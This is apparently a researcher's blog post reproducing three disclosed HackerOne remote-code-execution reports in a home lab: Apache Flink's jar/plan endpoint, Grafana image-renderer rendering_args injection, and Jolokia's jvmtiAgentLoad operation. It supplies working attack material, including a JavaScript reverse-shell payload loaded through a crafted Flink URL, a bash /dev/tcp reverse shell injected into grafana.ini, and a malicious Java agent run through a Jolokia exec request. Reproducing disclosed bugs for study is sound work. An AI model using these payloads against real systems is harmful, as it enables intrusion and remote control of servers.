Preface

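I happened to be browsing HackerOne that day, so I saw jarij's vulnerability reports as soon as they were disclosed. After reading the three RCE reports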

- Apache Flink RCE via GET jar/plan API Endpoint

- aiven_ltd Grafana RCE via SMTP server parameter injection

- [Kafka Connect] [JdbcSinkConnector][HttpSinkConnector] RCE by leveraging file upload via SQLite JDBC driver and SSRF to internal Jolokia

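I wanted to build local environments to reproduce them, but had no idea where to start. I had never actually used these products and did not know how to use some of their features, for example:

- how to deploy a Flink job

- how to create a Grafana dashboard, and similar operations.

It was only after chybeta published a post on Zhishi Xingqiu (知识星球), and pyn3rd published the article "一种JDBC Attack的新方式" (a new approach to JDBC attacks), that I decided to learn these products and build local environments to reproduce jarij's three vulnerability reports.

Below I describe my reproduction in two simple steps: environment setup, then attack. Some of the background involved, such as certain Java features, is not covered in depth, because while learning I only got as far as understanding it roughly and being able to use it, and I cannot explain the underlying principles well.

The rest of this post can be read alongside the slides by the author of the vulnerability reports.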

Apache Flink RCE via GET jar/plan API Endpoint

Version requirement:

- JDK > 8
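To check the JDK requirement before going further, the output of `java -version` can be parsed. The following is a minimal sketch, not part of the original reports; the function names are hypothetical, and it assumes the usual `version "..."` string that the JDK prints (to stderr), covering both the legacy `1.8.0_x` scheme and the modern `11.0.x` scheme.

```python
import re


def java_major_version(version_output: str) -> int:
    """Extract the major Java version from `java -version` output."""
    match = re.search(r'version "(\d+)(?:\.(\d+))?', version_output)
    if match is None:
        raise ValueError("no version string found")
    first, second = int(match.group(1)), match.group(2)
    # Legacy scheme: "1.8.0_292" means Java 8; modern scheme: "11.0.16" means Java 11.
    if first == 1 and second is not None:
        return int(second)
    return first


def meets_requirement(version_output: str, minimum: int = 9) -> bool:
    """True when the reported JDK is newer than 8 (major version >= 9)."""
    return java_major_version(version_output) >= minimum


# Hypothetical sample line, shaped like OpenJDK 11 output.
sample = 'openjdk version "11.0.16" 2022-07-19'
print(java_major_version(sample), meets_requirement(sample))
```

On a real machine the input could come from `subprocess.run(["java", "-version"], capture_output=True, text=True).stderr`.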

Environment setup

- Parallels Ubuntu 20.04 (IP: 10.211.55.3)

- Host machine: macOS (IP: 10.211.55.2)

- Visit the Flink website, then download and extract Flink



wget https://archive.apache.org/dist/flink/flink-1.15.2/flink-1.15.2-bin-scala_2.12.tgz

tar zxvf flink-1.15.2-bin-scala_2.12.tgz

- Install OpenJDK

sudo apt install openjdk-11-jdk

java -version

- Edit the configuration file to allow access from the LAN

sed -i 's/rest.bind-address: localhost/rest.bind-address: 0.0.0.0/' flink-1.15.2/conf/flink-conf.yaml

- Start Flink

cd flink-1.15.2/bin/

./start-cluster.sh



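- Visit the Flink service (port 8081 on 10.211.55.3, the address used later in this post) to check that it started successfully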
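Besides opening the web UI, the startup check can be scripted against Flink's REST API. This is a rough sketch under assumptions: it relies on the `/overview` endpoint returning JSON with `flink-version` and `slots-total` keys, the helper names are hypothetical, and the sample body is made up for illustration rather than captured from my environment.

```python
import json


def overview_url(host: str, port: int = 8081) -> str:
    """Build the URL of the cluster overview endpoint."""
    return f"http://{host}:{port}/overview"


def summarize_overview(body: str) -> str:
    """Summarize an /overview JSON body; missing keys are reported as unknown."""
    data = json.loads(body)
    version = data.get("flink-version", "unknown")
    slots = data.get("slots-total", "unknown")
    return f"Flink {version}, total slots: {slots}"


# Hypothetical response body, for illustration only.
sample_body = '{"taskmanagers": 1, "slots-total": 1, "flink-version": "1.15.2"}'
print(overview_url("10.211.55.3"))
print(summarize_overview(sample_body))
```

Against a live cluster, the body could be fetched with `urllib.request.urlopen(overview_url("10.211.55.3")).read().decode()`.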

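Attack

According to the vulnerability report, the target environment does not allow POST requests, but jobs can be run from the console and GET requests can be sent.

- To simulate the target environment, first build a jar for a job, then upload and run it. The file structure and contents are as follows: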



MANIFEST.MF (the file must end with a newline)

Manifest-Version: 1.0

Main-Class: UnboundStreamJob
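The trailing newline matters because the last manifest line may not be parsed correctly without it. As a small sketch (the helper names are hypothetical), the manifest can be generated so that the final line is always terminated:

```python
def render_manifest(main_class: str) -> str:
    """Render a minimal manifest whose last line ends with a newline."""
    lines = ["Manifest-Version: 1.0", f"Main-Class: {main_class}"]
    # Join the lines and terminate the final one as well.
    return "\n".join(lines) + "\n"


def ends_with_newline(text: str) -> bool:
    """Check the property that the manifest requires."""
    return text.endswith("\n")


manifest = render_manifest("UnboundStreamJob")
print(repr(manifest))
```

Writing `manifest` to `META-INF/MANIFEST.MF` with `open(path, "w", newline="\n")` keeps the line endings as rendered.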

UnboundStreamJob.java

import java.util.Arrays;

import org.apache.flink.api.common.functions.FlatMapFunction;

import org.apache.flink.api.common.typeinfo.Types;

import org.apache.flink.api.java.tuple.Tuple2;

import org.apache.flink.streaming.api.datastream.DataStreamSource;

import org.apache.flink.streaming.api.datastream.SingleOutputStreamOperator;

import org.apache.flink.streaming.api.environment.StreamExecutionEnvironment;

public class UnboundStreamJob {

@SuppressWarnings("deprecation")

public static void main(String[] args) throws Exception {

StreamExecutionEnvironment env = StreamExecutionEnvironment.getExecutionEnvironment();

DataStreamSource<String> source = env.socketTextStream("127.0.0.1", 9999);

SingleOutputStreamOperator<Tuple2<String, Integer>> sum = source.flatMap((FlatMapFunction<String, Tuple2<String, Integer>>) (lines, out) -> {

Arrays.stream(lines.split(" ")).forEach(s -> out.collect(Tuple2.of(s, 1)));

}).returns(Types.TUPLE(Types.STRING, Types.INT)).keyBy(0).sum(1);

sum.print("test");

env.execute();

}

}

pom.xml

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">

<modelVersion>4.0.0</modelVersion>

<groupId>com.xxx</groupId>

<artifactId>flinkJobdemo</artifactId>

<version>1.0</version>

<packaging>jar</packaging>

<name>flinkdemo</name>

<url>http://maven.apache.org</url>

<properties>

<flink.version>1.13.1</flink.version>

<scala.binary.version>2.12</scala.binary.version>

<slf4j.version>1.7.30</slf4j.version>

</properties>

<dependencies>

<dependency>

<groupId>org.apache.flink</groupId>

<artifactId>flink-java</artifactId>

<version>${flink.version}</version>

<scope>provided</scope>

</dependency>

<dependency>

<groupId>org.apache.flink</groupId>

<artifactId>flink-streaming-java_${scala.binary.version}</artifactId>

<version>${flink.version}</version>

<scope>provided</scope>

</dependency>

<dependency>

<groupId>org.apache.flink</groupId>

<artifactId>flink-clients_${scala.binary.version}</artifactId>

<version>${flink.version}</version>

<scope>provided</scope>

</dependency>

<dependency>

<groupId>org.apache.flink</groupId>

<artifactId>flink-runtime-web_${scala.binary.version}</artifactId>

<version>${flink.version}</version>

<scope>provided</scope>

</dependency>

<dependency>

<groupId>org.apache.flink</groupId>

<artifactId>flink-connector-kafka-0.11_${scala.binary.version}</artifactId>

<version>1.11.4</version>

</dependency>

<dependency>

<groupId>org.springframework.kafka</groupId>

<artifactId>spring-kafka</artifactId>

<version>2.7.8</version>

</dependency>

<dependency>

<groupId>org.slf4j</groupId>

<artifactId>slf4j-api</artifactId>

<version>${slf4j.version}</version>

<scope>provided</scope>

</dependency>

<dependency>

<groupId>org.slf4j</groupId>

<artifactId>slf4j-log4j12</artifactId>

<version>${slf4j.version}</version>

<scope>provided</scope>

</dependency>

<dependency>

<groupId>org.apache.logging.log4j</groupId>

<artifactId>log4j-to-slf4j</artifactId>

<version>2.14.0</version>

<scope>provided</scope>

</dependency>

</dependencies>

<build>

<plugins>

<plugin>

<groupId>org.apache.maven.plugins</groupId>

<artifactId>maven-compiler-plugin</artifactId>

<version>3.1</version>

<configuration>

<source>1.8</source>

<target>1.8</target>

</configuration>

</plugin>

<plugin>

<groupId>org.apache.maven.plugins</groupId>

<artifactId>maven-shade-plugin</artifactId>

<version>3.2.4</version>

<executions>

<execution>

<phase>package</phase>

<goals>

<goal>shade</goal>

</goals>

<configuration>

<artifactSet>

<excludes>

<exclude>com.google.code.findbugs:jsr305</exclude>

<exclude>org.slf4j:*</exclude>

<exclude>log4j:*</exclude>

</excludes>

</artifactSet>

<filters>

<filter>

<!-- Do not copy the signatures in the META-INF folder.

Otherwise, this might cause SecurityExceptions when using the JAR. -->

<artifact>*:*</artifact>

<excludes>

<exclude>META-INF/*.SF</exclude>

<exclude>META-INF/*.DSA</exclude>

<exclude>META-INF/*.RSA</exclude>

</excludes>

</filter>

</filters>

<transformers combine.children="append">

<transformer implementation="org.apache.maven.plugins.shade.resource.ServicesResourceTransformer">

</transformer>

</transformers>

</configuration>

</execution>

</executions>

</plugin>

</plugins>

</build>

</project>





使用Artifacts打包,从左往右依次点击蓝色高亮选项(选Empty下面的)



配置成如下图所示

点击OK



从上到下,依次点击蓝色高亮选项



点击Build,即可在out目录找到打包后的jar包



- Upload the packaged jar

Normally the Entry-Class is filled in automatically. Click Submit.



- On the host machine (10.211.55.2), start an http.server and place a.js in the served directory, with the following content:

var host="10.211.55.2";

var port=8044;

var cmd="/bin/bash";

var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();



Start the server and verify that it is reachable:

python3 -m http.server 8000



- On the host machine (10.211.55.2), listen on port 8044

- Attack



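Visit http://10.211.55.3:8081/jars/

Then visit the following URL in a browser, replacing {idvalue} with the id shown in the figure above (e3ea857b-4b5e-4889-8a03-3bc1fcfbd04a_flinkJobdemo.jar):

http://10.211.55.3:8081/jars/{idvalue}/plan?entry-class=com.sun.tools.script.shell.Main&programArg=-e,load(%22http://10.211.55.2:8000/a.js%22)&parallelism=1

As shown in the figure below, a.js is fetched and nc receives the reverse shell.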
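The two requests in this step can also be put together in a script, which makes the URL encoding explicit. This is only a sketch for the lab environment described here: the helper names are hypothetical, the `/jars` response is assumed to be JSON with a `files` list whose entries carry an `id`, and the sample body below is hand-written rather than captured output.

```python
import json
from urllib.parse import quote


def first_jar_id(jars_body: str) -> str:
    """Return the id of the first uploaded jar from a /jars JSON body."""
    files = json.loads(jars_body)["files"]
    if not files:
        raise ValueError("no uploaded jars")
    return files[0]["id"]


def plan_url(base: str, jar_id: str, entry_class: str,
             program_arg: str, parallelism: int = 1) -> str:
    """Build the GET URL for /jars/:jarid/plan with percent-encoded values."""
    # Keep "," "(" ")" ":" "/" literal, as in the URL used in this post;
    # everything else that is not URL-safe (for example '"') is encoded.
    safe = ",():/"
    return (f"{base}/jars/{quote(jar_id, safe='')}/plan"
            f"?entry-class={quote(entry_class, safe=safe)}"
            f"&programArg={quote(program_arg, safe=safe)}"
            f"&parallelism={parallelism}")


# Hand-written sample shaped like the assumed /jars response.
sample_jars = json.dumps({"files": [
    {"id": "e3ea857b-4b5e-4889-8a03-3bc1fcfbd04a_flinkJobdemo.jar",
     "name": "flinkJobdemo.jar"}]})

url = plan_url("http://10.211.55.3:8081", first_jar_id(sample_jars),
               "com.sun.tools.script.shell.Main",
               '-e,load("http://10.211.55.2:8000/a.js")')
print(url)
```

The double quotes become `%22`, which is why the browser URL above contains that sequence.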

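Notes:

- An error during reproduction may cause the Flink service to shut down, in which case the process has to be killed manually by its PID.

- According to the latest official documentation, /jars/:jarid/plan only supports POST requests. In my tests, however, it could still be accessed with GET.

- I tried to find an exploitable main function in JDK 8 and below, without success.

References: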

- https://hackerone.com/reports/1418891

- https://blog.csdn.net/feinifi/article/details/121293135

- https://nightlies.apache.org/flink/flink-docs-master/docs/ops/rest_api/

Grafana Image Renderer configuration file RCE

Environment setup

Run the following commands on VMware Ubuntu 20.04:

sudo apt-get install -y adduser libfontconfig1

wget https://dl.grafana.com/enterprise/release/grafana-enterprise_7.5.4_amd64.deb

sudo dpkg -i grafana-enterprise_7.5.4_amd64.deb

sudo grafana-cli plugins install grafana-image-renderer 3.0.0

sudo apt-get install libx11-6 libx11-xcb1 libxcomposite1 libxcursor1 libxdamage1 libxext6 libxfixes3 libxi6 libxrender1 libxtst6 libglib2.0-0 libnss3 libcups2 libdbus-1-3 libxss1 libxrandr2 libgtk-3-0 libasound2 libxcb-dri3-0 libgbm1 libxshmfence1 -y

sudo systemctl daemon-reload

sudo systemctl start grafana-server

sudo systemctl status grafana-server

Attack procedure



- Edit the contents of the configuration file grafana.ini, setting rendering_args as follows:

sudo vim /etc/grafana/grafana.ini

rendering_args = --renderer-cmd-prefix=bash -c bash$IFS-l$IFS>$IFS/dev/tcp/127.0.0.1/4444$IFS0<&1$IFS2>&1

Restart the Grafana service:

sudo systemctl restart grafana-server
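Before testing, it can help to confirm that the setting really ended up in the file. The sketch below reads `rendering_args` with Python's `configparser`. The section name `plugin.grafana-image-renderer` is my assumption about where the key lives (the post does not state it), the function name is hypothetical, and the sample value is a harmless placeholder.

```python
import configparser


def read_rendering_args(ini_text: str,
                        section: str = "plugin.grafana-image-renderer"):
    """Return the rendering_args value from ini text, or None if absent."""
    # interpolation=None keeps characters such as "%" and "$" literal;
    # strict=False tolerates duplicate keys instead of raising.
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(ini_text)
    return parser.get(section, "rendering_args", fallback=None)


# Placeholder configuration, not the value used in the attack.
sample_ini = """
[plugin.grafana-image-renderer]
rendering_args = --no-sandbox,--disable-gpu
"""

print(read_rendering_args(sample_ini))
```

For the real file, pass the text of /etc/grafana/grafana.ini; note that `configparser` rejects keys that appear before the first section header, so this only works when such top-level keys are commented out.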

- 监听

VMware-ubuntu20.04的4444端口

- 访问



http://{VMware-ubuntu20.04}:3000,登录后,新建一个dashboard(默认的即可)



Click Share.

Click Direct link rendered image.

- Check the nc listener window: the command has executed successfully

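Notes

- In my tests, this only works with Grafana 7. With Grafana 8 and above, once rendering_args is configured, using the /render feature immediately fails with errors such as being unable to launch the Chrome process. (I spent a ridiculously long time hunting for the cause and nearly gave up = =, thinking it was an environment problem, when it was actually a version problem; I did not dig further into why newer versions fail.) In newer versions the special characters at the end of the rendering_args value are also URL-encoded (I lost the screenshot, so it is omitted).

- About the grafana-image-renderer version: at one point I tried building the environment with Docker grafana 7.5.4 together with Docker grafana-image-renderer latest, but it produced errors, so I chose version 3.0.0 instead. This post keeps using that version.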
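Since the result depends on the Grafana major version, a quick version check can save some of the time I lost. This sketch assumes the `/api/health` endpoint returns JSON containing a `version` field; the function name and the sample body are hypothetical.

```python
import json


def grafana_major(health_body: str) -> int:
    """Return the major version from an /api/health JSON body."""
    version = json.loads(health_body)["version"]
    return int(version.split(".")[0])


# Made-up body shaped like the assumed /api/health response.
sample_health = '{"commit": "abc123", "database": "ok", "version": "7.5.4"}'

major = grafana_major(sample_health)
print("Grafana major version:", major, "(expected 7 for this reproduction)")
```

The body could be fetched from `http://{VMware-ubuntu20.04}:3000/api/health` with `urllib.request.urlopen`.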

References

- https://grafana.com/grafana/download?pg=get&platform=linux&plcmt=selfmanaged-box1-cta1

- https://grafana.com/docs/grafana/v9.0/setup-grafana/installation/debian/#2-start-the-server

RCE via the jvmtiAgentLoad operation

Version requirement:

- JDK 9 or later

With JDK 8 and below, I could not find the jvmtiAgentLoad operation under com.sun.management in Jolokia.

Environment setup



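Start the Spring service directly from IDEA on macOS (JDK 11).

Set up a Spring service that exposes the actuator/jolokia endpoint; LandGrey's environment can serve as a reference. Once IDEA is configured, start the service.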



Visit http://127.0.0.1:9094 in a browser.

As shown in the figure above, the environment is set up successfully.

Attack



- Visit http://localhost:9094/jolokia/list and search for jvmtiAgentLoad; the operation is present.
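Searching the list output by eye works, but the lookup can also be scripted. The sketch below assumes the Jolokia `list` response nests MBeans as `value -> domain -> properties -> {"op": {...}}`; the function name is hypothetical and the sample document is hand-written and heavily trimmed.

```python
import json


def find_operation(list_body: str, op_name: str) -> list:
    """Return the MBean names ("domain:props") that expose op_name."""
    value = json.loads(list_body).get("value", {})
    hits = []
    for domain, mbeans in value.items():
        if not isinstance(mbeans, dict):
            continue
        for props, info in mbeans.items():
            # Each MBean entry may carry an "op" map keyed by operation name.
            if isinstance(info, dict) and op_name in info.get("op", {}):
                hits.append(f"{domain}:{props}")
    return hits


# Trimmed, hand-written sample in the assumed shape.
sample_list = json.dumps({"status": 200, "value": {
    "com.sun.management": {"type=DiagnosticCommand": {
        "op": {"jvmtiAgentLoad": {"args": [], "ret": "java.lang.String"}}}},
    "java.lang": {"type=Memory": {"op": {"gc": {"args": [], "ret": "void"}}}},
}})

print(find_operation(sample_list, "jvmtiAgentLoad"))
```

An empty result on a JDK 8 target would match the version requirement stated at the start of this section.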

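Exploiting this operation involves the concept of JVMTI; see pyn3rd's article. With a rough understanding of what it means, we know that we need to implement a Java agent jar for jvmtiAgentLoad to load, which gives RCE.

- Implement the Java agent jar. Its directory structure and the contents of each file are as follows: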



j7ur8@192 /tmp % tree evilagent

evilagent

├── META-INF

│ └── MANIFEST.MF

├── evil.jar

└── org

└── example

└── JavaAgent.java

3 directories, 3 files

j7ur8@192 /tmp % cat evilagent/META-INF/MANIFEST.MF

Manifest-Version: 1.0

Agent-Class: org.example.JavaAgent

j7ur8@192 /tmp % cat evilagent/org/example/JavaAgent.java

package org.example;

import java.lang.instrument.Instrumentation;

public class JavaAgent {

private static final String RCE_COMMAND = "open -a Calculator.app";

public static void agentmain(String args, Instrumentation inst){

System.out.println("success123123");

try{

Runtime.getRuntime().exec(RCE_COMMAND);

}catch (Exception e){

e.printStackTrace();

}

System.out.println("fail");

}

}

j7ur8@192 /tmp %

Package it into a jar file:

javac org/example/JavaAgent.java

jar cfvm evil.jar META-INF/MANIFEST.MF .



- Use the jvmtiAgentLoad operation to load the malicious Java agent

http://127.0.0.1:9094/jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/tmp!/evilagent!/evil.jar

The calculator pops up successfully.
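The `!/` sequences in the exec URL come from Jolokia's path escaping, where `!` is the escape character and a literal `/` inside an argument is written as `!/`. A minimal sketch of that encoding follows; the function names are hypothetical and only these two escapes are handled.

```python
def jolokia_escape(part: str) -> str:
    """Escape one path segment for a Jolokia GET request."""
    # Escape "!" first so the "!" introduced for "/" is not escaped again.
    return part.replace("!", "!!").replace("/", "!/")


def exec_url(base: str, mbean: str, operation: str, *args: str) -> str:
    """Build a Jolokia exec URL: <base>/exec/<mbean>/<operation>/<args...>."""
    parts = [jolokia_escape(p) for p in (mbean, operation, *args)]
    return f"{base}/exec/" + "/".join(parts)


url = exec_url("http://127.0.0.1:9094/jolokia",
               "com.sun.management:type=DiagnosticCommand",
               "jvmtiAgentLoad",
               "/tmp/evilagent/evil.jar")
print(url)
```

With the jar path from this post, the result matches the URL requested above.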

References

- https://hackerone.com/reports/1547877

- http://tttang.com/archive/1831/

- https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-jolokia-logback-rce

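Summary

The attack techniques above mostly require JDK > 8 in the target environment. That being the case, I suppose you have to understand and be familiar with these specialized products to attack them well.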

跳跳糖
